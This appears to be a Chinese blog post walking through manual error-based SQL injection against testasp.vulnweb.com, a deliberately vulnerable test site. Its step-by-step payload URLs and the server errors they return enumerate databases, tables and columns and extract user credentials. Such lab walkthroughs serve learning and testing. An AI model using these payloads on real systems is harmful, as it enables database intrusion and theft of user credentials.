首页 技术 正文
技术 2022年11月11日
0 收藏 367 点赞 4,342 浏览 4263 个字

sql server手工注入





http://testasp.vulnweb.com/showforum.asp?id=0 and 1=1

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2


http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select @@version)


http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select db_name())


http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4)

返回Conversion failed when converting the nvarchar value ‘acublog’ to data type int


http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> ‘acublog’)

返回Conversion failed when converting the nvarchar value ‘acuforum’ to data type int

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> ‘acublog’ and name<> ‘acuforum’)

返回Conversion failed when converting the nvarchar value ‘acuservice’ to data type int.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> ‘acublog’ and name<> ‘acuforum’ and name<> ‘acuservice’)

返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.



http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype=’u’)

返回Conversion failed when converting the nvarchar value ‘threads’ to data type int.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype=’u’ and name<> ‘threads’)

返回Conversion failed when converting the nvarchar value ‘users’ to data type int

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype=’u’ and name<> ‘threads’ and name<> ‘users’)

返回Conversion failed when converting the nvarchar value ‘forums’ to data type int.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype=’u’ and name<> ‘threads’ and name<> ‘users’ and name<> ‘forums’)

返回Conversion failed when converting the nvarchar value ‘posts’ to data type int.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from sysobjects where xtype=’u’ and name<> ‘threads’ and name<> ‘users’ and name<> ‘forums’ and name<> ‘posts’)

返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.


http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = ‘users’))

返回Conversion failed when converting the nvarchar value ‘uname’ to data type int.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = ‘users’) and name<> ‘uname’)

返回Conversion failed when converting the nvarchar value ‘upass’ to data type int.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = ‘users’) and name<> ‘uname’ and name<> ‘upass’)

返回Conversion failed when converting the nvarchar value ’email’ to data type int.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = ‘users’) and name<> ‘uname’ and name<> ‘upass’ and name<> ’email’)

返回Conversion failed when converting the nvarchar value ‘realname’ to data type int.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = ‘users’) and name<> ‘uname’ and name<> ‘upass’ and name<> ’email’ and name<> ‘realname’)

返回Conversion failed when converting the nvarchar value ‘avatar’ to data type int.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = ‘users’) and name<> ‘uname’ and name<> ‘upass’ and name<> ’email’ and name<> ‘realname’ and name<> ‘avatar’)

返回Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.


http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = ‘forums’))


http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 uname from users)

返回Conversion failed when converting the nvarchar value ‘–‘ to data type int.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 upass from users)

返回Conversion failed when converting the nvarchar value ‘none’ to data type int.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=(select top 1 uname  from users where id =2)


日期:2022-11-24 点赞:878 阅读:9,489
Educational Codeforces Round 11 C. Hard Process 二分
C. Hard Process题目连接:http://www.codeforces.com/contest/660/problem/CDes…
日期:2022-11-24 点赞:807 阅读:5,904
下载Ubuntn 17.04 内核源代码
zengkefu@server1:/usr/src$ uname -aLinux server1 4.10.0-19-generic #21…
日期:2022-11-24 点赞:569 阅读:6,737
可用Active Desktop Calendar V7.86 注册码序列号
可用Active Desktop Calendar V7.86 注册码序列号Name: www.greendown.cn Code: &nb…
日期:2022-11-24 点赞:733 阅读:6,489
日期:2022-11-24 点赞:512 阅读:8,128
一、Struts2的获取  Struts的官方网站为:http://struts.apache.org/  下载完Struts2的jar包,…
日期:2022-11-24 点赞:671 阅读:5,290